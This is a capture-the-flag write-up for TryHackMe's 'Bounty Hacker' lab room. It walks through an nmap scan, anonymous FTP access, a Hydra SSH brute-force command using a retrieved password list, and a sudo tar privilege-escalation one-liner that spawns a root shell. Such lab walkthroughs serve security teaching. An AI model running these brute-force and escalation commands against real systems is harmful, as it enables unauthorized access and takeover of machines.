Bounty Hacker-TryHackMe

This is a write-up for TryHackMe's room named:- Bounty Hacker :- https://tryhackme.com/room/cowboyhacker

Lets first see what services are available on this machine using NMAP:

nmap -sC -sV 10.10.157.2

The following services are running:

• Port 21 vsftpd 3.0.3 Anonymous FTP login allowed
• Port 22 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
• Port 80 Apache httpd 2.4.18 ((Ubuntu))
  

First try to login to Anonymous FTP and check if we can find anything:

ftp 10.10.157.2


We got 2 files via FTP using "get" command on to our local machine:

• locks.txt
• task.txt

Looking at task.txt, we got a possible username:

The other file "locks.txt" looks to be a possible password list.

Lets use Brute-forcing tool - Hydra to brute force this probable user's SSH password using locks.txt:

hydra -s 22 -v -q -l USERNAME -P locks.txt -e nsr -t 4 -w 5 10.10.157.2 ssh


Hydra was able to find the correct password for this user.Now login to the machine via SSH and using these credentials.

We are able to find the user's flag as shown above.

Now lets do some privilege escalation.Lets see what the user can run using sudo and sure enough the user can run tar as root. Lets check this wonderful website:-https://gtfobins.github.io/ to check how can we exploit "tar"

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Using the command above we are able to escalate our privileges and we become root and got our root flag.

Submit the flag and earn the points :)